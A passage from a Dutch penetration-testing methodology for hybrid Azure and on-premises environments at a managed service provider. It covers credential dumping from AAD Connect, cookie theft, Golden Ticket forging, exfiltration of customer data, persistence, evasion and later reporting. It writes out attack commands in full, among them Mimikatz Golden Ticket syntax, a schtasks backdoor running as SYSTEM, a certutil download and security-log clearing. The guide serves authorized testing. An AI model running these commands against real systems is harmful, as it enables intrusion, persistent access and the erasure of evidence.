[ ]Krijg toegang tot interne web apps via Azure Application Proxy.Voorbeeld: Compromitteer SP gebruikt voor App Proxy. Gebruik SP creds om potentieel direct te interacteren met connector of interne applicatie indien onveilig geconfigureerd.
[ ]Exploit interne services toegankelijk via Azure Private Endpoints.Voorbeeld: Azure Function App heeft Private Endpoint naar interne SQL DB
10.50.1.20. Compromitteer Function App, maak gebruik van zijn netwerkpad om te verbinden met interne DB.
[ ][HYBRIDE PIVOT] Intern -> Azure:[ ]Dump creds/tokens van AAD Connect / ADFS servers.Voorbeeld: Compromitteer AAD Connect server. Dump LSASS geheugen -> vind creds voor
MSOL_SyncAccount. Gebruik deze potentieel krachtige creds viaConnect-MgGraph -Credential. Of gebruik ADFSDump tool indien ADFS gecompromitteerd.
[ ]Dump browser cookies/tokens/opgeslagen creds.Voorbeeld: Gebruik LaZagne/Mimikatz
dpapi::chromeop gecompromitteerde interne ontwikkelaarsmachine -> vind opgeslagen cookies voorportal.azure.com. Replay cookie in browser om toegang te krijgen tot portal.
[ ]Indien Domain Admin verkregen, manipuleer gesynchroniseerde attributen/groepen.Voorbeeld: Als DA intern, voeg gecompromitteerd gebruikersaccount toe aan een groep
Azure_Global_Admins_Synceddie synchroniseert naar AAD en GA rol toegewezen krijgt. Wacht op AAD Connect sync cyclus.
[ ]Man-in-the-Middle ADFS verkeer.Voorbeeld: Indien netwerkpositie het toelaat (bv. ARP spoofing op ADFS server segment - zeer luidruchtig/riskant), onderschep SAML tokens. Vereist specifieke tooling en netwerk setup.
Azure PowerShell Voorbeeld (Verkrijg AAD Connect Sync Account Info - Vereist Privs):
Stap 5.4: [DOELSTELLING] Bereiken van Missie Doelstellingen
[ ]Uitleg: Focus verkregen toegang op het bereiken van specifieke doelen uit RoE.[ ]Checklist & Voorbeelden:[ ]Navigeer door netwerken/systemen naar doel resource(s).Voorbeeld: Doel is Klant A database. Lateraal bewegen via RDP intern naar
SQLSERVER-A.
[ ]Extraheer doeldata.Voorbeeld: Voer SQL query
SELECT * FROM CustomerPIIuit opSQLSERVER-A. Kopieer resultaten. Exfiltreer data via vastgesteld C2 kanaal of Azure file share.
[ ]Voer doelactie uit als bewijs.Voorbeeld: Doel om controle over Klant B's key app te demonstreren. Gebruik gecompromitteerde Azure creds met Contributor rol om de Web App
ClientB-WebAppte stoppen metStop-AzWebApp.
[ ][RoE Check] [POST-DA/GA] Demonstreer DA/GA impact (Golden Ticket, DCSync, etc.).Voorbeeld: Na interne DA + krbtgt hash verkregen: Op Kali, gebruik Mimikatz of
ticketer.pyom Kerberos Golden Ticket te smeden voorAdministratorgebruiker. Gebruik ticket om toegang te krijgen tot elke resource in domein (psexec.py -k ...). Indien Azure GA, demonstreer door nieuwe testgebruiker met GA rol aan te maken. Vereist Expliciete RoE Goedkeuring.
Azure PowerShell Voorbeeld (Toegang tot Key Vault Secret - Demonstreren Doelstelling):
Fase 6: Persistentie & Ontwijkingsanalyse
Doel: Vestig footholds om toegang over tijd te behouden (alleen indien expliciet toegestaan voor demonstratie door RoE), of primair analyseer en documenteer potentiële persistentie mechanismen die een aanvaller zou kunnen gebruiken in zowel Azure als interne omgevingen. Overweeg hoe aanvallers detectie zouden kunnen ontwijken.
Stap 6.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Persistentie Analyse/POC
[ ]Uitleg: Identificeer of, indien toegestaan, implementeer manieren om Azure toegang te behouden. POC vereist RoE.[ ]Checklist & Voorbeelden:[ ](Analyse/POC) Voeg credentials toe aan Service Principals/Apps.Voorbeeld (POC):
Opschonen Vereist.
[ ](Analyse/POC) Creëer nieuwe geprivilegieerde Gebruiker/Gast.Voorbeeld (POC):
Opschonen Vereist.
[ ](Analyse/POC) Wijzig PIM voor permanente eligibiliteit/toewijzing.Voorbeeld (Analyse): Beoordeel PIM rol instellingen via Azure Portal/Graph - zoek naar rollen zonder activatie vereisten of lange maximale activatie duren. POC vereist Graph PIM schrijf scopes.
[ ](Analyse) Kwaadaardige Federatie wijzigingen.Voorbeeld (Analyse): Aanvaller met Global Admin voegt eigen SAML IdP toe via
New-MgDomainFederationConfiguration, waardoor ze AAD auth kunnen omzeilen.
[ ](Analyse/POC) Automation Account schedules/webhooks.Voorbeeld (POC):
Opschonen Vereist.
[ ](Analyse/POC) Deploy backdoor via Web App/Function/VM Extension.Voorbeeld (POC):
Opschonen Vereist.
Azure PowerShell Voorbeeld (Creëer Geplande Runbook - POC Vereist RoE):
Stap 6.2: [HOGE-IMPACT INTERN] Interne Persistentie Analyse/POC (Vereist Interne Foothold & Expliciete RoE)
[ ]Uitleg: Identificeer of, indien toegestaan, implementeer manieren om interne toegang te behouden. Implementatie is hoog-risico.[ ]Checklist & Voorbeelden:[ ](Analyse/POC [HOGE-IMPACT]) Geplande Taken (schtasks /create), Services (sc create), Registry Run Keys (reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run).Voorbeeld (POC): Op gecompromitteerde host:
schtasks /create /tn "Updater" /tr "c:\tools\backdoor.exe" /sc ONLOGON /ru SYSTEM. Opschonen Vereist.
[ ](Analyse/POC [HOGE-IMPACT]) WMI Event Subscriptions.Voorbeeld (Analyse): Gebruik PowerShell
Register-WmiEventofSharpWMIom filter/consumer paar aan te maken dat payload uitvoert op specifieke event (bv. logon).
[ ](Analyse/POC [POST-DA]) Golden/Silver Tickets, DCSync rechten, DSRM misbruik, AdminSDHolder.Voorbeeld (POC - Golden Ticket): Gebruik Mimikatz op DA-gecompromitteerde host:
kerberos::golden /user:Administrator /domain:internal.corp /sid:<DomainSID> /krbtgt:<KRBTGT_HASH> /ptt. Gebruik dit ticket om toegang te krijgen tot elke machine. Geen directe opschoning mogelijk behalve KRBTGT wachtwoord reset (zeer disruptief).
Azure PowerShell Voorbeeld (Informatief): N.v.t. - Vereist interne host commando's.
Stap 6.3: [HYBRIDE PIVOT] Ontwijkingsoverwegingen Analyse
[ ]Uitleg: Analyseer hoe aanvaller detectie door EDR, NDR, SIEM, en Azure monitoring zou kunnen vermijden.[ ]Checklist & Voorbeelden:[ ]MFA Bypass technieken.Voorbeeld (Analyse): Aanvaller gebruikt token gestolen via AiTM phishing; Aanvaller registreert eigen apparaat via zwak MFA registratiebeleid.
[ ]Living off the Land (LotL).Voorbeeld (Analyse): Aanvaller gebruikt
certutil -urlcache -split -f <URL> file.exeom tools te downloaden; Gebruikt PowerShell remoting voor laterale beweging ipv implants. Gebruikt AzurerunCommandvoor executie.
[ ]Log manipulatie/uitschakeling.Voorbeeld (Analyse): Aanvaller wijzigt Azure Diagnostic Settings (
Set-AzDiagnosticSetting) om verzenden van logs naar SIEM te stoppen; Gebruiktwevtutil cl Securityop interne host (vereist hoge privileges).
[ ]Verbergen van netwerkverkeer.Voorbeeld (Analyse): C2 verkeer getunneld over DNS of HTTPS; Maakt gebruik van Azure Private Link om te communiceren met PaaS services zonder verkeer publiek bloot te stellen.
[ ]Interne Ontwijking.Voorbeeld (Analyse): Gebruik van PowerShell AMSI bypass snippets; Gebruik van proces injectie technieken om malware te verbergen in legitieme processen.
Azure PowerShell Voorbeeld (Controleer Azure Policy voor Log Forwarding):
Fase 7: Opschonen & Strategische Rapportage (Volledig Beeld)
Doel: Verwijder testartefacten nauwgezet waar mogelijk en veilig (RoE afhankelijk). Lever een uitgebreid rapport dat bevindingen over zowel Azure als interne omgevingen dekt, risico holistisch kwantificeert, uitvoerbare herstelacties biedt voor beide domeinen, en strategische aanbevelingen doet.
Stap 7.1: Actief Opschonen (STERK RoE Afhankelijk)
[ ]Uitleg: Verwijder tools, persistentie mechanismen, gecreëerde gebruikers/resources, en draai wijzigingen terug die tijdens de test zijn gemaakt, INDIEN veilig en geautoriseerd. Opschonen kan complex en riskant zijn. Documenteer alles.[ ]Checklist & Voorbeelden:[ ][RoE Check] Verwijder gecreëerde Azure resources/tags/credentials/role assignments.Voorbeeld:
[ ][RoE Check] [HOGE-IMPACT] Probeer interne persistentie te verwijderen.Voorbeeld: Draai
schtasks /delete /tn "Updater" /f. Draaisc delete BadService. Verwijder registry keys metreg delete.
[ ][RoE Check] [HOGE-IMPACT] Verwijder geüploade tools/payloads van interne systemen.Voorbeeld:
del c:\temp\nc.exe,rm /tmp/linpeas.sh.
[ ]Wis commando geschiedenis waar gepast/mogelijk.Voorbeeld: Draai
Clear-Historyin PowerShell; verwijder.bash_historyop Linux host.
[ ]Documenteer alle opschoonacties en eventuele bekende restanten/onomkeerbare wijzigingen.Voorbeeld: Rapport Appendix D: "RG 'PentestPOC_RG...' verwijderd. Geplande taak 'Updater' verwijderd. Kon verwijdering van geheugen artefacten van Mimikatz executie niet verifiëren."
Azure PowerShell Voorbeeld (Verwijder Resource Group Gemaakt Tijdens Test):
Stap 7.2: Uitgebreide Strategische Rapportage
[ ]Uitleg: Creëer een gedetailleerd rapport dat het volledige verhaal van de beoordeling over beide omgevingen vertelt, focust op business impact en uitvoerbare aanbevelingen.[ ]Checklist & Voorbeelden (Rapport Secties):[ ]Managementsamenvatting (Kernrisico's, business impact, samenvatting bevindingen).Voorbeeld: "Bevinding MSP-01 (Gecompromitteerd intern service account gesynchroniseerd naar Azure met Global Admin privileges) presenteert kritiek risico dat volledige tenant compromittering toestaat..."
[ ]Scope & Doelstellingen (Duidelijk gedefinieerde Azure + Interne scope, RoE highlights).Voorbeeld: "Scope omvatte Tenant XYZ, Sub ABC, Interne reeks 10.x.x.x. High-impact testen goedgekeurd per RoE Appendix C."
[ ]Methodologie (Gedetailleerde Azure + Interne technieken gebruikt, differentieer low/high impact).Voorbeeld: "Fase 2 gebruikte Azure PowerShell voor RBAC enumeratie en Nmap/BloodHound voor interne AD analyse. Fase 3 omvatte Kerberoasting pogingen..."
[ ]Bevindingen: Gedetailleerde items voor elke vuln/misconfig (Azure/Intern), Bewijs (screenshots, logs), Risico Rating (CVSS + Scope factor), Uitvoerbare Herstelacties (PoSh voor Azure, GPO/Config voor Intern).Voorbeeld Bevinding (Hybride): "HYB-03: Onveilige VNet Peering staat Azure Dev VM toegang toe tot Interne DC SMB. Risico: Kritiek. Bewijs: Nmap scan van Azure VM
172.16.1.5naar Interne DC10.50.1.10poort 445 succesvol. Herstel: Pas NSG regel toe op DC subnet die SMB weigert van Dev VNet adresruimte."
[ ]Aanval Narratief(ven) + Diagrammen.Voorbeeld: Stroomdiagram dat initiele phish -> interne werkstation compromittering -> Mimikatz -> laterale beweging -> AAD Connect server compromittering -> sync account cred diefstal -> Azure GA compromittering -> Lighthouse pivot naar client tenant toont.
[ ]Strategische Aanbevelingen: Holistisch advies (Identiteitshygiëne - PAW/Tiering, AAD Connect hardening, Netwerksegmentatie over omgevingen heen, Zero Trust principes, Monitoring/Detectie - Defender suite/Sentinel).Voorbeeld: "Implementeer Tiered Access Model (PAW) voor AD en Azure. Verhard AAD Connect server beveiliging. Schakel PIM in & handhaaf voor alle geprivilegieerde rollen. Vereis phishing-resistente MFA."
[ ]Opschoonacties Log.Voorbeeld: Tabel die elk gecreëerd/gewijzigd artefact lijst en bevestiging van verwijdering/terugdraai status.
Azure PowerShell Voorbeeld (Informatief - Verzamel Azure AD Sign-in Log info voor rapport):
Stap 7.3: Debrief & Kennisoverdracht
[ ]Uitleg: Presenteer bevindingen duidelijk aan zowel technische staf als management bij de MSP en relevante klanten. Leg de risico's en herstelacties effectief uit.[ ]Checklist & Voorbeelden:[ ]Plan debrief meeting(en).Voorbeeld: Kalenderuitnodigingen verstuurd naar MSP IT Security team en Klant A contact voor aparte technische debriefs. Executive summary meeting gepland met MSP leiderschap.
[ ]Bereid presentatie slides voor.Voorbeeld: PowerPoint deck inclusief overzicht, kernbevindingen, aanvalspad diagrammen, herstelprioriteiten, strategische thema's.
[ ]Wees voorbereid om technische vragen te beantwoorden.Voorbeeld: Wees klaar om uit te leggen hoe de ADCS exploit werkte of waarom de specifieke NSG regel onvoldoende is.
[ ]Zorg voor duidelijke overdracht van het rapport en scripts.Voorbeeld: Definitief rapport PDF en ZIP-bestand met informatieve/herstel PowerShell snippets aangeleverd via beveiligde transfer link.
Azure PowerShell Voorbeeld (N/A - Communicatie Stap)
Azure PowerShell Automatiseringsscripts
Deze scripts automatiseren ENUMERATIE en ANALYSE stappen waar mogelijk. HOGE-IMPACT acties (Exploitatie, Credential Dumping, Actieve Persistentie, Opschonen van Interne Systemen) MOGEN NIET volledig geautomatiseerd worden en vereisen handmatige uitvoering met zorgvuldig oordeel gebaseerd op de RoE. Gebruik deze scripts als hulpmiddelen, niet als autonome aanvalsplatformen.
Last updated